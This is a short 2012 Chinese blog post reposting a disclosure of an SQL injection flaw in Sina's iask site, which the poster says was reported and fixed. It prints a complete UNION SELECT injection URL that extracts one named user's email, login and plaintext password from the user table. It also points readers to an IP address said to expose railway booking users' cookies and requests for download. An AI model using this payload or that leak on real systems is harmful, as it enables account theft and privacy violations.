作者: wingwy
发表于:2012年01月5日
15,914 次浏览,
3 条评论 »
Sina这个公司,再出了这么大的泄密事件后还用明文存密码。另外,大家可以关注这个ip 114.255.171.227 它记录了包括访问铁道部网站12306的所有途径用户的信息,包括IP地址,发送的请求,包含的cookie等等,而且,每个人都可以直接访问下载。据说铁道订票网站也是以明文传递密码的。你觉得他们是无知和无意的吗?
这是转载的 “2012年新浪微博用户密码泄露漏洞”http://www.youxia.org/2012/01/2012-SINA-weibo-user-password-lose.html
相关厂商:www.sina.com
作者:http://weibo.com/evilniang
发现时间:2012-1-1
漏洞类型:sql注射
危害等级:高
漏洞状态:已修复
首先申明:该漏洞发现后本人已联系新浪官方修复漏洞,目前漏洞以修补。文章内容公布,仅供参考学习。
新浪网iask存在sql注射漏洞,利用漏洞可读取iask数据库内内容。包括明文密码在内的7000多W新浪用户信息。
漏洞存在点: http://iask.sina.com.cn//prize/event_getorderlist.php?id=999999.9
漏洞利用方式:
http://iask.sina.com.cn/prize/event_getorderlist.php?id=999999.9+UNION+ALL+SELECT+%28SELECT+concat%280x5e24,user.uid,0x7c,user.email,0x7c,user.login,0x7c,user.passwd,0x245e%29+FROM+%60whatis%60.user+where+uid=1303977362+LIMIT+0,1%29,2,3,4,5,6,7,8,9,10,11–
这里我们通过构造数据库查询语句获得用户uid=1303977362的uid、login、email、passwd等信息。通过修改字段还可以获取其他信息 。
阅读全文